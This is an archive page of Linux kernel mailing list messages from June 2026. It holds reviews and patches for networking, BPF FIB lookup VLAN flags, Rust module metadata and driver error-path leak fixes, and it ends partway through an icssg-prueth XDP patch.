* Re: [PATCH v4 2/9] rust: module: add `THIS_MODULE` const to `ModuleMetadata` trait
From: Andreas Hindborg @ 2026-06-23 12:28 UTC (permalink / raw)
To: Alvin Sun, Miguel Ojeda, Boqun Feng, Gary Guo,
Björn Roy Baron, Benno Lossin, Alice Ryhl, Trevor Gross,
Danilo Krummrich, Luis Chamberlain, Petr Pavlu, Daniel Gomez,
Sami Tolvanen, Aaron Tomlin, Greg Kroah-Hartman,
Rafael J. Wysocki, David Airlie, Simona Vetter, Daniel Almeida,
Arnd Bergmann, Brendan Higgins, David Gow, Rae Moar, Breno Leitao,
Jens Axboe, Dave Ertman, Ira Weiny, Leon Romanovsky, Igor Korotin,
FUJITA Tomonori, Bjorn Helgaas, Krzysztof Wilczyński,
Arve Hjønnevåg, Todd Kjos, Christian Brauner,
Carlos Llamas
Cc: rust-for-linux, linux-modules, driver-core, dri-devel, nova-gpu,
linux-kselftest, kunit-dev, linux-block, linux-kernel, netdev,
linux-pci, Alvin Sun
In-Reply-To: <20260623-fix-fops-owner-v4-2-0daf5f077d5c@linux.dev>
Alvin Sun <alvin.sun@linux.dev> writes:
> Since `const_refs_to_static` has been stable as of the MSRV bump, a
> `ThisModule` pointer can now be used in const contexts.
>
> Add a `THIS_MODULE` const to the `ModuleMetadata` trait so that modules
> can provide their `ThisModule` pointer in const contexts such as static
> `file_operations`.
>
> Add a `this_module()` helper to retrieve the `THIS_MODULE` pointer of a
> given module type, and update `__init` to use it instead of the
> `THIS_MODULE` static generated by the `module!` macro.
>
> The `static THIS_MODULE` generated by the `module!` macro is retained
> for backwards compatibility with existing users and removed in a later
> patch once all references have been migrated.
>
> Signed-off-by: Alvin Sun <alvin.sun@linux.dev>
Reviewed-by: Andreas Hindborg <a.hindborg@kernel.org>
Best regards,
Andreas Hindborg
^ permalink raw reply
* Re: [PATCH net] net: do not acquire dev->tx_global_lock in netdev_watchdog_up()
From: Simon Horman @ 2026-06-23 12:22 UTC (permalink / raw)
To: Eric Dumazet
Cc: David S . Miller, Jakub Kicinski, Paolo Abeni, netdev,
eric.dumazet, Marek Szyprowski
In-Reply-To: <20260622110108.69541-1-edumazet@google.com>
On Mon, Jun 22, 2026 at 11:01:08AM +0000, Eric Dumazet wrote:
> Marek Szyprowski reported a deadlock during system resume when virtio_net
> driver is used.
>
> The deadlock occurs because netif_device_attach() is called while holding
> dev->tx_global_lock (via netif_tx_lock_bh() in virtnet_restore_up()).
> netif_device_attach() calls __netdev_watchdog_up(), which now also tries
> to acquire dev->tx_global_lock to synchronize with dev_watchdog().
>
> This recursive lock acquisition results in a deadlock.
>
> Fix this by removing the tx_global_lock acquisition from netdev_watchdog_up().
>
> The critical state (watchdog_timer and watchdog_ref_held) is already
> protected by dev->watchdog_lock, which was introduced in the blamed commit.
>
> Fixes: 8eed5519e496 ("net: watchdog: fix refcount tracking races")
> Reported-by: Marek Szyprowski <m.szyprowski@samsung.com>
> Closes: https://lore.kernel.org/netdev/a443376e-5187-4268-93b3-58047ef113a8@samsung.com/
> Signed-off-by: Eric Dumazet <edumazet@google.com>
> Tested-by: Marek Szyprowski <m.szyprowski@samsung.com>
Reviewed-by: Simon Horman <horms@kernel.org>
^ permalink raw reply
* Re: [PATCH v1 0/3] thunderbold: A few cleanups
From: Mika Westerberg @ 2026-06-23 12:17 UTC (permalink / raw)
To: Uwe Kleine-König (The Capable Hub)
Cc: Mika Westerberg, Yehezkel Bernat, Andreas Noever, Andrew Lunn,
David S. Miller, Eric Dumazet, Jakub Kicinski, Paolo Abeni,
netdev, linux-kernel, linux-usb
In-Reply-To: <cover.1781776904.git.u.kleine-koenig@baylibre.com>
Hi,
On Thu, Jun 18, 2026 at 12:14:49PM +0200, Uwe Kleine-König (The Capable Hub) wrote:
> Hello,
>
> I'm currently working on a project that includes looking at all device
> ID structures from <linux/mod_devicetable.h>. While doing that for
> tb_service_id, I spotted these patch opportunities.
>
> These are all non-critical and also my quest doesn't depend on this, so
> there is no urge to apply these patches. My suggestion is to apply them
> via the thunderbold tree during the next merge window with an ack from
> the network guys.
>
> The first patch touches drivers/net and drivers/thunderbold. It could
> theretically be split, but then this results in at least 3 commits which
> seems excessive to handle three drivers, so I kept it as a single patch.
>
> The third patch is a style change and so is subjective. Drop it, if you
> don't like it. Here splitting would be easy, but given that patch #1
> already touches the same files, letting these go in together without
> splitting seems to be sensible.
>
> Best regards
> Uwe
>
> Uwe Kleine-König (The Capable Hub) (3):
> thunderbold: Stop passing matched device ID to .probe()
> thunderbold: Assert that a service driver has a probe callback
> thunderbold: Drop comma after device id array terminator
Fixed the typo "thunderbold" -> "thunderbolt" and applied all to
thunderbolt.git/next. I also took the networking patch, let me know if
that's not okay (I'm the maintainer of that driver too and it looked fine).
Thanks!
^ permalink raw reply
* Re: [PATCH bpf-next v4 2/3] bpf: Add BPF_FIB_LOOKUP_VLAN_INPUT flag to bpf_fib_lookup() helper
From: Toke Høiland-Jørgensen @ 2026-06-23 12:00 UTC (permalink / raw)
To: Avinash Duduskar, ast, daniel, andrii
Cc: eddyz87, memxor, martin.lau, song, yonghong.song, jolsa, emil,
john.fastabend, sdf, davem, edumazet, kuba, pabeni, horms, shuah,
hawk, yatsenko, leon.hwang, kpsingh, a.s.protopopov, ameryhung,
rongtao, eyal.birger, bpf, netdev, linux-kernel, linux-kselftest,
dsahern
In-Reply-To: <20260623025147.1001664-3-avinash.duduskar@gmail.com>
Avinash Duduskar <avinash.duduskar@gmail.com> writes:
> BPF_FIB_LOOKUP_VLAN resolves a VLAN egress. The reverse is also
> useful: an XDP program receiving a VLAN-tagged frame on a physical
> device wants the lookup to behave as if the packet had arrived on the
> corresponding VLAN subinterface, so iif-based policy routing and VRF
> table selection use the right ingress.
>
> Add BPF_FIB_LOOKUP_VLAN_INPUT. When set, params->h_vlan_proto and
> params->h_vlan_TCI are read as an input VLAN tag and the matching VLAN
> device of params->ifindex is resolved with __vlan_find_dev_deep_rcu().
> The device must be up and in the same network namespace as
> params->ifindex (a VLAN device can be moved to another netns while
> registered on its parent; receive would deliver into that other
> namespace, which a lookup here cannot represent). If params->ifindex
> is itself a VLAN device, its inner (QinQ) subinterface is matched.
> For a bond or team, a tag on a port matches no device and returns
> NOT_FWDED; pass the master's ifindex.
> The lookup then runs with the resolved device as the ingress;
> params->ifindex itself is not modified on the input side. When the
> resolved device is enslaved to a VRF, both the full lookup (via the
> l3mdev rule) and BPF_FIB_LOOKUP_DIRECT (via l3mdev_fib_table_rcu())
> select the VRF's table from the resolved ingress. That follows from
> feeding the resolved device to the flow as the ingress
> (fl4.flowi4_iif = dev->ifindex), which is what makes l3mdev resolve
> the VRF master from the subinterface rather than from
> params->ifindex.
>
> The two failure classes get different treatment on purpose. A
> h_vlan_proto other than 802.1Q/802.1ad is API misuse and returns
> -EINVAL, since it would otherwise reach the WARN in vlan_proto_idx()
> with a program-controlled value. An unmatched VID, a device that is
> down, or one in another namespace is a data outcome and returns
> BPF_FIB_LKUP_RET_NOT_FWDED, matching the DIRECT path when
> fib_get_table() finds no table and mirroring real ingress, where the
> receive path drops such frames. A VID of 0 (a priority tag) is looked
> up literally and normally fails the same way; receive instead
> processes such frames untagged, so callers should not set the flag for
> priority tags. Proceeding on the physical device for any of these
> would be fail-open for the policy-routing cases above.
>
> The h_vlan fields share a union with tbid, so the flag cannot be
> combined with BPF_FIB_LOOKUP_TBID. It describes ingress, so it also
> cannot be combined with BPF_FIB_LOOKUP_OUTPUT. Both combinations
> return -EINVAL; restricting now keeps a later relaxation backward
> compatible. Combining with BPF_FIB_LOOKUP_VLAN is allowed: the tag is
> consumed on the ingress side and the egress tag is written on
> success.
>
> Under !CONFIG_VLAN_8021Q the __vlan_find_dev_deep_rcu() stub returns
> NULL, so every lookup with the flag returns NOT_FWDED, which is
> correct since no VLAN device can exist.
>
> Suggested-by: Toke Høiland-Jørgensen <toke@redhat.com>
> Signed-off-by: Avinash Duduskar <avinash.duduskar@gmail.com>
Reviewed-by: Toke Høiland-Jørgensen <toke@redhat.com>
^ permalink raw reply
* Re: [PATCH bpf-next v4 1/3] bpf: Add BPF_FIB_LOOKUP_VLAN flag to bpf_fib_lookup() helper
From: Toke Høiland-Jørgensen @ 2026-06-23 11:58 UTC (permalink / raw)
To: Avinash Duduskar, ast, daniel, andrii
Cc: eddyz87, memxor, martin.lau, song, yonghong.song, jolsa, emil,
john.fastabend, sdf, davem, edumazet, kuba, pabeni, horms, shuah,
hawk, yatsenko, leon.hwang, kpsingh, a.s.protopopov, ameryhung,
rongtao, eyal.birger, bpf, netdev, linux-kernel, linux-kselftest,
dsahern
In-Reply-To: <20260623025147.1001664-2-avinash.duduskar@gmail.com>
Avinash Duduskar <avinash.duduskar@gmail.com> writes:
> bpf_fib_lookup() returns the FIB-resolved egress ifindex straight
> from the fib result. When the egress is a VLAN device, the returned
> ifindex is the VLAN netdev's, which has no XDP xmit handler; XDP
> programs that want to forward the frame (e.g. xdp-forward) must
> instead target the underlying physical device and push the VLAN tag
> themselves. Today the program has no way to learn either the
> underlying ifindex or the VLAN tag without maintaining its own
> VLAN-to-ifindex map in userspace and refreshing it on netlink
> events.
>
> Add BPF_FIB_LOOKUP_VLAN. When the caller sets this flag and the fib
> result is a VLAN device whose immediate parent is a real (non-VLAN)
> device in the same network namespace, populate the existing output
> fields params->h_vlan_proto and params->h_vlan_TCI from the VLAN
> device and replace params->ifindex with the parent's ifindex.
> params->h_vlan_TCI carries the VID only, with PCP and DEI bits zero; a
> consumer wanting to set egress priority writes PCP itself.
> params->smac is the VLAN device's own address, which can differ from
> the parent's.
>
> Only the immediate parent is resolved, via vlan_dev_priv(dev)->real_dev
> and not vlan_dev_real_dev(), which walks to the bottom of a stack. When
> the immediate parent is not a real device in the same namespace, the
> lookup returns BPF_FIB_LKUP_RET_VLAN_FAILURE and leaves params->ifindex
> at the input. This covers a stacked VLAN (QinQ), where the immediate
> parent is itself a VLAN device and one h_vlan_proto/h_vlan_TCI pair
> cannot describe two tags, and a parent in another network namespace (a
> VLAN device can be moved while its parent stays), whose ifindex would
> be meaningless in the caller's namespace. A program that wants the VLAN
> device's own ifindex re-issues the lookup without BPF_FIB_LOOKUP_VLAN,
> so the unreducible case stays distinct from a physical egress. That
> distinction matters for XDP: a program cannot xmit on a VLAN device, so
> a success carrying the VLAN ifindex would make it redirect to a device
> with no ndo_xdp_xmit and drop the frame at xdp_do_flush(). The swap and
> the vlan fields are written only on the reduce path; other output
> fields keep their existing behaviour, so a frag-needed result still
> reports the route mtu in params->mtu_result.
>
> On the skb path without tot_len the deferred mtu check is done against
> the resolved egress device. To keep that the VLAN device rather than
> the parent after the swap, bpf_ipv4_fib_lookup()/bpf_ipv6_fib_lookup()
> hand the FIB-result device back to the caller; the XDP path always
> runs the route-mtu check and passes NULL. When the flag is not set,
> behaviour is unchanged: h_vlan_proto and h_vlan_TCI are zeroed and
> ifindex is left at the FIB result.
>
> The new block is compiled only under CONFIG_VLAN_8021Q since
> vlan_dev_priv() is not defined otherwise; without that config
> is_vlan_dev() is constant false and the flag is accepted but never
> acts. That is safe because no VLAN device can exist there, so every
> egress is already physical.
>
> This lets an XDP redirect target the physical device and learn the
> tag to push in a single lookup, which xdp-forward's optional VLAN
> mode (xdp-project/xdp-tools#504) wants from the kernel side.
>
> The helper's input semantics are unchanged; the reverse direction
> (supplying a tag as lookup input) is added in the following patch.
>
> Suggested-by: Toke Høiland-Jørgensen <toke@redhat.com>
> Signed-off-by: Avinash Duduskar <avinash.duduskar@gmail.com>
> ---
> include/uapi/linux/bpf.h | 28 +++++++++++++-
> net/core/filter.c | 69 ++++++++++++++++++++++++----------
> tools/include/uapi/linux/bpf.h | 28 +++++++++++++-
> 3 files changed, 104 insertions(+), 21 deletions(-)
>
> diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h
> index 89b36de5fdbb..8d0058d88eb2 100644
> --- a/include/uapi/linux/bpf.h
> +++ b/include/uapi/linux/bpf.h
> @@ -3532,6 +3532,26 @@ union bpf_attr {
> * Use the mark present in *params*->mark for the fib lookup.
> * This option should not be used with BPF_FIB_LOOKUP_DIRECT,
> * as it only has meaning for full lookups.
> + * **BPF_FIB_LOOKUP_VLAN**
> + * If the fib lookup resolves to a VLAN device whose
> + * parent is a real (non-VLAN) device, set
> + * *params*->h_vlan_proto and *params*->h_vlan_TCI from
> + * the VLAN device and replace *params*->ifindex with the
> + * parent's ifindex. *params*->h_vlan_TCI carries the VID
> + * only, with PCP and DEI bits zero; a consumer wanting to
> + * set egress priority writes PCP itself. *params*->smac is
> + * the VLAN device's own address, which can differ from the
> + * parent's. Only the immediate parent is resolved; if it
> + * is itself a VLAN device (QinQ) or in another namespace,
> + * the egress cannot be reduced to a physical device plus
> + * one tag and the lookup returns
> + * **BPF_FIB_LKUP_RET_VLAN_FAILURE** with *params*->ifindex
> + * left at the input. Re-issue without
> + * **BPF_FIB_LOOKUP_VLAN** to obtain the VLAN device's own
> + * ifindex. The swap and the vlan fields
> + * are written only on success; other output fields keep
> + * the helper's existing behaviour, so a frag-needed result
> + * still reports the route mtu in *params*->mtu_result.
> *
> * *ctx* is either **struct xdp_md** for XDP programs or
> * **struct sk_buff** tc cls_act programs.
> @@ -7327,6 +7347,7 @@ enum {
> BPF_FIB_LOOKUP_TBID = (1U << 3),
> BPF_FIB_LOOKUP_SRC = (1U << 4),
> BPF_FIB_LOOKUP_MARK = (1U << 5),
> + BPF_FIB_LOOKUP_VLAN = (1U << 6),
> };
>
> enum {
> @@ -7340,6 +7361,7 @@ enum {
> BPF_FIB_LKUP_RET_NO_NEIGH, /* no neighbor entry for nh */
> BPF_FIB_LKUP_RET_FRAG_NEEDED, /* fragmentation required to fwd */
> BPF_FIB_LKUP_RET_NO_SRC_ADDR, /* failed to derive IP src addr */
> + BPF_FIB_LKUP_RET_VLAN_FAILURE, /* VLAN egress, parent unresolvable */
> };
>
> struct bpf_fib_lookup {
> @@ -7393,7 +7415,11 @@ struct bpf_fib_lookup {
>
> union {
> struct {
> - /* output */
> + /*
> + * output with BPF_FIB_LOOKUP_VLAN: set from the
> + * resolved egress VLAN device (see the flag); zeroed
> + * on other successful lookups.
> + */
> __be16 h_vlan_proto;
> __be16 h_vlan_TCI;
> };
> diff --git a/net/core/filter.c b/net/core/filter.c
> index 2e96b4b847ce..8345295d84de 100644
> --- a/net/core/filter.c
> +++ b/net/core/filter.c
> @@ -6201,10 +6201,28 @@ static const struct bpf_func_proto bpf_skb_get_xfrm_state_proto = {
> #endif
>
> #if IS_ENABLED(CONFIG_INET) || IS_ENABLED(CONFIG_IPV6)
> -static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params, u32 mtu)
> +static int bpf_fib_set_fwd_params(struct net_device *dev,
> + struct bpf_fib_lookup *params,
> + u32 flags, u32 mtu)
> {
> params->h_vlan_TCI = 0;
> params->h_vlan_proto = 0;
> +
> +#if IS_ENABLED(CONFIG_VLAN_8021Q)
> + if ((flags & BPF_FIB_LOOKUP_VLAN) && is_vlan_dev(dev)) {
If you move the ifdef into the if statement, the if statement can have
an else-branch that assigns params->ifindex, so you don't need the
restore dance (see below).
> + struct net_device *real_dev = vlan_dev_priv(dev)->real_dev;
> +
> + if (!is_vlan_dev(real_dev) &&
> + net_eq(dev_net(real_dev), dev_net(dev))) {
> + params->h_vlan_proto = vlan_dev_vlan_proto(dev);
> + params->h_vlan_TCI = htons(vlan_dev_vlan_id(dev));
> + params->ifindex = real_dev->ifindex;
> + } else {
> + return BPF_FIB_LKUP_RET_VLAN_FAILURE;
> + }
> + }
> +#endif
> +
> if (mtu)
> params->mtu_result = mtu; /* union with tot_len */
>
> @@ -6214,8 +6232,10 @@ static int bpf_fib_set_fwd_params(struct bpf_fib_lookup *params, u32 mtu)
>
> #if IS_ENABLED(CONFIG_INET)
> static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> - u32 flags, bool check_mtu)
> + u32 flags, bool check_mtu,
> + struct net_device **fwd_dev)
> {
> + u32 in_ifindex = params->ifindex;
> struct neighbour *neigh = NULL;
> struct fib_nh_common *nhc;
> struct in_device *in_dev;
> @@ -6347,16 +6367,23 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> memcpy(params->smac, dev->dev_addr, ETH_ALEN);
>
> set_fwd_params:
> - return bpf_fib_set_fwd_params(params, mtu);
> + if (fwd_dev)
> + *fwd_dev = dev;
> + err = bpf_fib_set_fwd_params(dev, params, flags, mtu);
> + if (err == BPF_FIB_LKUP_RET_VLAN_FAILURE)
> + params->ifindex = in_ifindex;
> + return err;
I think it's better to just move the assignment of params->ifindex
entirely into bpf_fib_set_fwd_params(), instead of this restore dance.
That way this can be simplified to:
err = bpf_fib_set_fwd_params(dev, params, flags, mtu);
if (!err && fwd_dev)
*fwd_dev = dev;
return err;
> }
> #endif
>
> #if IS_ENABLED(CONFIG_IPV6)
> static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> - u32 flags, bool check_mtu)
> + u32 flags, bool check_mtu,
> + struct net_device **fwd_dev)
> {
> struct in6_addr *src = (struct in6_addr *) params->ipv6_src;
> struct in6_addr *dst = (struct in6_addr *) params->ipv6_dst;
> + u32 in_ifindex = params->ifindex;
> struct fib6_result res = {};
> struct neighbour *neigh;
> struct net_device *dev;
> @@ -6486,13 +6513,19 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
> memcpy(params->smac, dev->dev_addr, ETH_ALEN);
>
> set_fwd_params:
> - return bpf_fib_set_fwd_params(params, mtu);
> + if (fwd_dev)
> + *fwd_dev = dev;
> + err = bpf_fib_set_fwd_params(dev, params, flags, mtu);
> + if (err == BPF_FIB_LKUP_RET_VLAN_FAILURE)
> + params->ifindex = in_ifindex;
> + return err;
Same as above.
-Toke
^ permalink raw reply
* [PATCH] net: sparx5: unregister blocking notifier on init failure
From: Haoxiang Li @ 2026-06-23 11:57 UTC (permalink / raw)
To: andrew+netdev, davem, edumazet, kuba, pabeni, Steen.Hegelund,
daniel.machon, UNGLinuxDriver, kees, horms, bjarni.jonasson,
lars.povlsen
Cc: netdev, linux-arm-kernel, linux-kernel, Haoxiang Li, stable
sparx5_register_notifier_blocks() registers the switchdev blocking
notifier before allocating the ordered workqueue. If the workqueue
allocation fails, the error path unregisters the switchdev and netdevice
notifiers, but leaves the blocking notifier registered.
Add a separate error label for the workqueue allocation failure path and
unregister the switchdev blocking notifier there.
Fixes: d6fce5141929 ("net: sparx5: add switching support")
Cc: stable@vger.kernel.org
Signed-off-by: Haoxiang Li <haoxiang_li2024@163.com>
---
drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c b/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c
index 644458108dd2..dac4dd833127 100644
--- a/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c
+++ b/drivers/net/ethernet/microchip/sparx5/sparx5_switchdev.c
@@ -765,11 +765,13 @@ int sparx5_register_notifier_blocks(struct sparx5 *s5)
sparx5_owq = alloc_ordered_workqueue("sparx5_order", 0);
if (!sparx5_owq) {
err = -ENOMEM;
- goto err_switchdev_blocking_nb;
+ goto err_alloc_workqueue;
}
return 0;
+err_alloc_workqueue:
+ unregister_switchdev_blocking_notifier(&s5->switchdev_blocking_nb);
err_switchdev_blocking_nb:
unregister_switchdev_notifier(&s5->switchdev_nb);
err_switchdev_nb:
--
2.25.1
^ permalink raw reply related
* [PATCH] octeontx2-af: Free BPID bitmap on setup failure
From: Haoxiang Li @ 2026-06-23 11:43 UTC (permalink / raw)
To: sgoutham, lcherian, gakula, hkelam, sbhatta, andrew+netdev, davem,
edumazet, kuba, pabeni, horms
Cc: netdev, linux-kernel, Haoxiang Li, stable
nix_setup_bpids() allocates bp->bpids with rvu_alloc_bitmap(), which uses
a plain kcalloc(). If any of the following devm_kcalloc() allocations for
the BPID mapping arrays fails, the function returns without freeing the
bitmap. Free the BPID bitmap before returning from those error paths.
Fixes: d6212d2e41a0 ("octeontx2-af: Create BPIDs free pool")
Cc: stable@vger.kernel.org
Signed-off-by: Haoxiang Li <haoxiang_li2024@163.com>
---
drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
index d8989395e875..0297c7ab0614 100644
--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
+++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_nix.c
@@ -528,19 +528,24 @@ static int nix_setup_bpids(struct rvu *rvu, struct nix_hw *hw, int blkaddr)
bp->fn_map = devm_kcalloc(rvu->dev, bp->bpids.max,
sizeof(u16), GFP_KERNEL);
if (!bp->fn_map)
- return -ENOMEM;
+ goto free_bpids;
bp->intf_map = devm_kcalloc(rvu->dev, bp->bpids.max,
sizeof(u8), GFP_KERNEL);
if (!bp->intf_map)
- return -ENOMEM;
+ goto free_bpids;
bp->ref_cnt = devm_kcalloc(rvu->dev, bp->bpids.max,
sizeof(u8), GFP_KERNEL);
if (!bp->ref_cnt)
- return -ENOMEM;
+ goto free_bpids;
return 0;
+
+free_bpids:
+ rvu_free_bitmap(&bp->bpids);
+ bp->bpids.bmap = NULL;
+ return -ENOMEM;
}
void rvu_nix_flr_free_bpids(struct rvu *rvu, u16 pcifunc)
--
2.25.1
^ permalink raw reply related
* Re: [PATCH net] net: ethernet: qualcomm: ppe: Demote from supported and fix maintainer addresses
From: Andrew Lunn @ 2026-06-23 11:33 UTC (permalink / raw)
To: Krzysztof Kozlowski
Cc: Jie Luo, Bjorn Andersson, Michael Turquette, Stephen Boyd,
Brian Masney, Rob Herring, Krzysztof Kozlowski, Conor Dooley,
Andrew Lunn, David S. Miller, Eric Dumazet, Jakub Kicinski,
Paolo Abeni, Lei Wei, Suruchi Agarwal, Pavithra R, linux-kernel,
linux-arm-msm, linux-clk, devicetree, netdev
In-Reply-To: <f8441903-c768-46a1-8f95-b1b25d420a2c@oss.qualcomm.com>
> If address did not work for half a year, I really doubt that you commit
> to above.
I tend to agree. Maybe we should set it to Orphaned, and then decide
in 6 months time if it can be set back to Maintained?
Andrew
^ permalink raw reply
* Re: [PATCH net] net: ethernet: qualcomm: ppe: Demote from supported and fix maintainer addresses
From: Andrew Lunn @ 2026-06-23 11:31 UTC (permalink / raw)
To: Jie Luo
Cc: Krzysztof Kozlowski, Bjorn Andersson, Michael Turquette,
Stephen Boyd, Brian Masney, Rob Herring, Krzysztof Kozlowski,
Conor Dooley, Andrew Lunn, David S. Miller, Eric Dumazet,
Jakub Kicinski, Paolo Abeni, Lei Wei, Suruchi Agarwal, Pavithra R,
linux-kernel, linux-arm-msm, linux-clk, devicetree, netdev
In-Reply-To: <8b0560ae-af5c-4d54-be02-d186be1d799c@oss.qualcomm.com>
On Tue, Jun 23, 2026 at 05:42:34PM +0800, Jie Luo wrote:
>
>
> On 6/23/2026 4:10 PM, Andrew Lunn wrote:
> >> Driver is not supported - in terms of how netdev understands supported
> >> commitment - if maintainer does not care to receive the patches for its
> >> code, so demote it to "maintained" to reflect true status.
> >
> > Maybe "Orphan" would be better, if the listed Maintainer is not doing
> > any Maintainer work?
> >
> > Andrew
>
> Hello Andrew, Krzysztof,
> I will continue to maintain the listed drivers, so their status can
> remain Supported.
Please understand that being a Maintainer requires that you respond to
patches and questions about this driver, give Reviewed-by:, ask for
patches to be changed etc. If you don't respond, ideally with 2 to 3
days, the driver will be set to Orphaned.
If you want to maintain the Supported status, we can help you set up
the needed CI system, and get it registered so it reports the results.
Andrew
^ permalink raw reply
* Re: [PATCH net v3 1/2] net: ethernet: sunplus: spl2sw: fix phy_node refcount leak in remove
From: Andrew Lunn @ 2026-06-23 11:24 UTC (permalink / raw)
To: Shitalkumar Gandhi
Cc: Wells Lu, Jakub Kicinski, David S. Miller, Eric Dumazet,
Paolo Abeni, Simon Horman, netdev, linux-kernel,
Shitalkumar Gandhi
In-Reply-To: <f3bdd4c91f3e2269b4e256075f9dc70808b1b8e9.1782195965.git.shitalkumar.gandhi@cambiumnetworks.com>
On Tue, Jun 23, 2026 at 12:11:42PM +0530, Shitalkumar Gandhi wrote:
> mac->phy_node is acquired via of_parse_phandle() in spl2sw_probe() and
> stored in the mac private data, transferring ownership of the
> device_node reference to mac. On driver removal, spl2sw_phy_remove()
> disconnects the PHY but never drops that reference, so each
> probe-then-remove cycle leaks one of_node refcount per port permanently.
>
> Drop the reference after phy_disconnect(). While at it, remove the
> redundant inner "if (ndev)" check; comm->ndev[i] was just verified
> non-NULL on the line above.
>
> Compile-tested only; no SP7021 hardware available.
>
> Fixes: fd3040b9394c ("net: ethernet: Add driver for Sunplus SP7021")
> Signed-off-by: Shitalkumar Gandhi <shitalkumar.gandhi@cambiumnetworks.com>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Andrew
^ permalink raw reply
* [PATCH net v2] net: ti: icssg-prueth: fix XDP_TX from the AF_XDP zero-copy RX path
From: David Carlier @ 2026-06-23 11:22 UTC (permalink / raw)
To: danishanwar, rogerq, andrew+netdev, netdev
Cc: davem, edumazet, kuba, pabeni, horms, m-malladi, hawk,
john.fastabend, sdf, ast, daniel, bpf, linux-arm-kernel,
linux-kernel, stable, David Carlier
On XDP_TX from the zero-copy RX path, emac_run_xdp() converts the xsk
buffer via xdp_convert_zc_to_xdp_frame(), which clones the data into a
fresh MEM_TYPE_PAGE_ORDER0 page that is not DMA mapped. Transmitting it
as PRUETH_TX_BUFF_TYPE_XDP_TX derives the DMA address with
page_pool_get_dma_addr(), reading an uninitialized page->dma_addr, so
the device DMAs from a bogus address (corrupt TX, or an IOMMU fault).
Pick the TX buffer type from the frame's memory type: keep
PRUETH_TX_BUFF_TYPE_XDP_TX for page_pool frames and use
PRUETH_TX_BUFF_TYPE_XDP_NDO for the cloned zero-copy frame, which is then
DMA mapped through the NDO path and unmapped on completion.
While at it, fix the page_pool XDP_TX completion path. A
PRUETH_TX_BUFF_TYPE_XDP_TX frame carries a page_pool-owned DMA mapping
(established against rx_chn->dma_dev), yet prueth_xmit_free()
unconditionally calls dma_unmap_single() on it with tx_chn->dma_dev,
tearing down a mapping the driver does not own; xdp_return_frame()
already recycles the page back to the pool. Tag such frames with a
dedicated PRUETH_SWDATA_XDPF_TX type so the completion path skips the
unmap, the same way PRUETH_SWDATA_XSK buffers are handled.
Fixes: 7a64bb388df3 ("net: ti: icssg-prueth: Add AF_XDP zero copy for RX")
Fixes: 62aa3246f462 ("net: ti: icssg-prueth: Add XDP support")
Cc: stable@vger.kernel.org
Signed-off-by: David Carlier <devnexen@gmail.com>
---
v2:
- fold in the page_pool XDP_TX completion-path unmap fix raised by
Meghana Malladi: tag page_pool TX frames with PRUETH_SWDATA_XDPF_TX
so prueth_xmit_free() skips dma_unmap_single() on a pool-owned
mapping; xdp_return_frame() already recycles the page.
- add Fixes: 62aa3246f462 for that path.
- no change to the original zero-copy fix.
v1: https://lore.kernel.org/netdev/20260620213756.87499-1-devnexen@gmail.com
drivers/net/ethernet/ti/icssg/icssg_common.c | 20 +++++++++++++++++---
drivers/net/ethernet/ti/icssg/icssg_prueth.h | 1 +
2 files changed, 18 insertions(+), 3 deletions(-)
diff --git a/drivers/net/ethernet/ti/icssg/icssg_common.c b/drivers/net/ethernet/ti/icssg/icssg_common.c
index 82ddef9c17d5..96c8bf5ef671 100644
--- a/drivers/net/ethernet/ti/icssg/icssg_common.c
+++ b/drivers/net/ethernet/ti/icssg/icssg_common.c
@@ -185,7 +185,7 @@ void prueth_xmit_free(struct prueth_tx_chn *tx_chn,
first_desc = desc;
next_desc = first_desc;
swdata = cppi5_hdesc_get_swdata(first_desc);
- if (swdata->type == PRUETH_SWDATA_XSK)
+ if (swdata->type == PRUETH_SWDATA_XSK || swdata->type == PRUETH_SWDATA_XDPF_TX)
goto free_pool;
cppi5_hdesc_get_obuf(first_desc, &buf_dma, &buf_dma_len);
@@ -259,6 +259,7 @@ int emac_tx_complete_packets(struct prueth_emac *emac, int chn,
napi_consume_skb(skb, budget);
break;
case PRUETH_SWDATA_XDPF:
+ case PRUETH_SWDATA_XDPF_TX:
xdpf = swdata->data.xdpf;
dev_sw_netstats_tx_add(ndev, 1, xdpf->len);
total_bytes += xdpf->len;
@@ -769,7 +770,8 @@ u32 emac_xmit_xdp_frame(struct prueth_emac *emac,
k3_udma_glue_tx_dma_to_cppi5_addr(tx_chn->tx_chn, &buf_dma);
cppi5_hdesc_attach_buf(first_desc, buf_dma, xdpf->len, buf_dma, xdpf->len);
swdata = cppi5_hdesc_get_swdata(first_desc);
- swdata->type = PRUETH_SWDATA_XDPF;
+ swdata->type = buff_type == PRUETH_TX_BUFF_TYPE_XDP_TX ?
+ PRUETH_SWDATA_XDPF_TX : PRUETH_SWDATA_XDPF;
swdata->data.xdpf = xdpf;
/* Report BQL before sending the packet */
@@ -804,6 +806,7 @@ EXPORT_SYMBOL_GPL(emac_xmit_xdp_frame);
*/
static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len)
{
+ enum prueth_tx_buff_type tx_buff_type;
struct net_device *ndev = emac->ndev;
struct netdev_queue *netif_txq;
int cpu = smp_processor_id();
@@ -826,11 +829,21 @@ static u32 emac_run_xdp(struct prueth_emac *emac, struct xdp_buff *xdp, u32 *len
goto drop;
}
+ /* In AF_XDP zero-copy mode xdp_convert_buff_to_frame()
